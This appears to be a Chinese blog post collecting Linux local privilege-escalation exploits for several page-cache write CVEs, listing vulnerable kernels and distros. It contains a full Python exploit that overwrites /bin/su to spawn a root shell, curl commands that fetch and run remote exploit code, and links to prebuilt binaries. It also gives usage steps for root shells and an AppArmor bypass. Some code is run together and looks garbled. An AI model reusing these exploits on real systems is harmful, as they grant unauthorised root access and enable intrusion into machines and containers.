两个月来各自基于CoW的LPE如雨后春笋破土而出。一直想写一篇完整的LPE合集,要清晰列出CVE以及适用范围。每次要用了再去找那实在是太麻烦了。
Copy Fail (CVE-2026-31431)
可用版本
6.12: < 6.12.856.6: < 6.6.1376.1: < 6.1.1705.15: < 5.15.2045.10: < 5.10.254Exploit
官方Exp one-liner:
curl https://copy.fail/exp | python3 && su不过slice需要python 3.10以上才有,过于golf导致兼容性一般。这里推荐使用下面这个exp:
#!/usr/bin/env python3
# This version utilizes ctypes as a drop in for 'splice()'# for exploiting systems with python > 3.10.
import os as g,zlib,socket as simport ctypes
libc = ctypes.CDLL("libc.so.6", use_errno=True)
_splice = libc.splice_splice.argtypes = [ ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint]
def splice(fd_in, fd_out, count, offset_src=None, flags=0): off_in = None if offset_src is not None: off_in = ctypes.pointer(ctypes.c_long(offset_src))
res = _splice(fd_in, off_in, fd_out, None, count, flags) if res < 0: err = ctypes.get_errno() raise OSError(err, os.strerror(err)) return resdef d(x):return bytes.fromhex(x)def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();splice(f, w, o, offset_src=0);splice(r, u.fileno(), o) try:u.recv(8+t) except:0try:f=g.open("/bin/su",0)except:f=g.open("/usr/bin/su",0)i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))while i<len(e):c(f,i,e[i:i+4]);i+=4g.system("su")Copy Fail + K8S 攻击面
找到一个PoC,尚未验证,应该是可用的。仓库地址:https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC
Dirty Frag (CVE-2026-43284 (xfrm/ESP) + CVE-2026-43500 (RxRPC))
也叫Copy_Fail2。同样属于CVE-2026-31431类型,但是不同的子系统(XFRM/ESP|RxRPC)。
可用版本
Ubuntu 24.04.4: 6.17.0-23-genericRHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64openSUSE Tumbleweed: 7.0.2-1-defaultCentOS Stream 10: 6.12.0-224.el10.x86_64AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64Fedora 44: 6.19.14-300.fc44.x86_64Exploit
C实现:https://github.com/v4bel/dirtyfragC实现:https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_BoogalooPython实现:https://github.com/guiimoraes/CVE-2026-31431C实现,点击下载:dirtyfrag.zip,静态编译。
(ctf) ➜ tmp tree dirtyfragdirtyfrag├── assets│ ├── demo.gif│ ├── tux.png│ └── write-up.md├── exp├── exp.c└── README.md
2 directories, 6 files使用方法:
./exp && id
# 恢复污染echo 3 > /proc/sys/vm/drop_caches另一个C实现,可以直接下载这个:Copy_Fail2-Electric_Boogaloo.zip,已经静态编译好(OrbStack Ubuntu GLIBC 2.39-0ubuntu8.7)。
(ctf) ➜ tmp tree Copy_Fail2-Electric_BoogalooCopy_Fail2-Electric_Boogaloo├── aa-rootns├── aa-rootns.c├── copyfail2├── copyfail2.c├── ipv6│ ├── copyfail2v6.c│ └── run.sh├── README.md└── run.sh
2 directories, 8 files使用方法:
./run.sh # install + drop into root shell./run.sh --clean # revert /etc/passwd via the same primitive如果还是有问题(静态编译应该不会有问题),尝试自行编译:
sudo apt install -y libssl-dev gccgcc -O2 -Wall copyfail2.c -o copyfail2 -lcryptogcc -O2 -Wall aa-rootns.c -o aa-rootnsPython有one-liner,不过Ubuntu当apparmor_restrict_unprivileged_userns启用时,需要先保存下来再执行,管道符会失效:
curl -sL ttps://raw.githubusercontent.com/guiimoraes/copyfail2-py/main/exploit.py > /tmp/x.pypython3 /tmp/x.pyPinTheft (CVE-2026-43494|需要开启RDS)
这没啥用啊,但是也算一个系列就收集一下。Not vulnerable by default on most distros (RDS is rarely enabled).
适用版本
- Kernel with
CONFIG_RDSandCONFIG_RDS_TCPenabled io_uringenabled (kernel.io_uring_disabled=0)- Kernel ≥ 6.13 (for optimal io_uring features)
- At least one readable SUID-root binary on the system
- x86_64 architecture
Not vulnerable by default on most distros (RDS is rarely enabled).
Exploit
仓库地址:https://github.com/0xBlackash/CVE-2026-43494.git
# 1. Clone & Compilegit clone https://github.com/0xBlackash/CVE-2026-43494.gitcd CVE-2026-43494gcc -O2 -static CVE-2026-43494.c -o pintheft
# 2. Runsudo ./pintheftPACKET_EDIT_MEM (CVE-2026-46331 | 2026/06/17)
适用版本(< v7.1-rc7)
| Distro | Kernel | Flag | Result |
|---|---|---|---|
| RHEL 10.0 | 6.12.0-228.el10 | (none) | ROOT |
| Debian 13 trixie | 6.12.90+deb13.1 | (none) | ROOT |
| Ubuntu 24.04.4 | 6.17.0-22 | —ubuntu | ROOT |
| Ubuntu 26.04 | 7.0.0-14-generic | —ubuntu | FAIL |
这是官方仓库给的,实测Ubuntu 24.04.4 6.17.0-35-generic也可以,如果有相近的版本都值得测试。

Exploit
官方仓库:https://github.com/sgkdev/packet_edit_meme
预编译压缩包(静态编译):packet_edit_meme.zip
(ctf) ➜ tmp tree packet_edit_memepacket_edit_meme├── Makefile├── packet_edit_meme├── packet_edit_meme.c├── pedit_primitive.c├── pedit_primitive.h├── README.md├── test_cve└── test_cve.c
1 directory, 8 files注意,Ubuntu 有 AppArmor gate,需要先使用
aa-exec bypass,这有一定条件,但完整安装的Ubuntu大概率直接可用。
使用方法:
make./packet_edit_meme./packet_edit_meme --ubuntu # AppArmor-gated Ubuntu: aa-exec bypass firstDIRTYFAIL (合集)
这不是单一的poc,是:Detector + PoC for Linux page-cache write vulnerabilities: Copy Fail (CVE-2026-31431) and Dirty Frag (CVE-2026-43284/43500).
很全面的工具,方便测试和快速验证,官方仓库在这里:https://github.com/KaraZajac/DIRTYFAIL.git。
适用版本
| CVE / variant | Name | DIRTYFAIL coverage |
|---|---|---|
| CVE-2026-31431 | Copy Fail (algif_aead authencesn page-cache write) | Detect + full PoC |
| CVE-2026-43284 v4 | Dirty Frag — IPv4 xfrm-ESP page-cache write | Detect + full PoC |
| CVE-2026-43284 v6 | Dirty Frag — IPv6 xfrm-ESP page-cache write (esp6) | Detect + full PoC |
| CVE-2026-43500 | Dirty Frag — RxRPC page-cache write | Detect + full PoC |
| Copy Fail GCM variant | xfrm-ESP rfc4106(gcm(aes)) page-cache write | Detect + full PoC |
Exploit
可以去官方仓库自行编译。这里给出一个预编译的压缩包(静态编译):
点击下载:DIRTYFAIL.zip
(ctf) ➜ tmp tree -L 1 DIRTYFAILDIRTYFAIL├── build├── dirtyfail├── docs├── LICENSE├── Makefile├── NOTICE.md├── README.md├── src├── tests└── tools
6 directories, 5 files使用方法:./dirtyfail --help
如果这篇文章对你有帮助,欢迎分享给更多人!
部分信息可能已经过时









